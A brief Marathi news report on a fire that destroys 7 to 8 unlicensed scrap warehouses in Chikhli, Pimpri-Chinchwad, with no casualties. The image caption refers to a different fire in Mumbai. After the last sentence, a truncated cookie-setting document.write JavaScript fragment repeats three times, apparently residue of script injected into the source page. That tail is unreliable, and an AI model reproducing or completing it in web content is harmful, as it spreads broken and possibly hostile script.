पिंपरी-चिंचवडमध्ये ७ ते ८ भंगार गोदामांना भीषण आग
![A fire broke out at a studio in Goregaon, Mumbai, 8 fire brigade vehicles arrived](https://mahaenews.com/wp-content/uploads/2019/04/Fire-fighter-696x368.jpg)
पिंपरी-चिंचवड परिसरातील चिखली येथे भंगार गोदामाला भीषण आग लागल्याची घटना घडली आहे. यात कोणतीही जीवितहानी झाली नसून ७ ते ८ भंगाराची गोदामं जळून खाक झाली आहेत. विशेष म्हणजे हे सर्व विनापरवाना चालत होतं अशी माहिती अग्निशमन दलाचे मुख्य अधिकारी किरण गावडे यांनी दिली आहे. महापौर राहुल जाधव यांनी घटनेसंबंधी माहिती दिली, तोपर्यंत अग्निशमन दलाला याची कल्पना नव्हती.
चिखली परिसरात मोठ्या प्रमाणावर भंगाराची दुकानं, गोदामं असून मोठ्या प्रमाणावर आग लागल्याच्या घटना घडतात. सोमवारी पहाटे पाच वाजण्याच्या सुमारास महापौर राहुल जाधव यांनी चिखली परिसरात आग लागल्याची माहिती अग्निशमन विभागाला दिली. त्यानंतर घटनास्थळी जाऊन अग्निशमनच्या तब्बल १२ ते १५ वाहनांनी आग आटोक्यात आणली. यामध्ये पिंपरी, प्राधिकरण,भोसरी,तळवडे,चिखलीसह अनेक अग्निशमन दलाच्या गाड्याच्या सहभाग होता. quot;; path=/; expires=”+date.toGMTString(),document.write(‘ quot;; path=/; expires=”+date.toGMTString(),document.write(‘ quot;; path=/; expires=”+date.toGMTString(),document.write(‘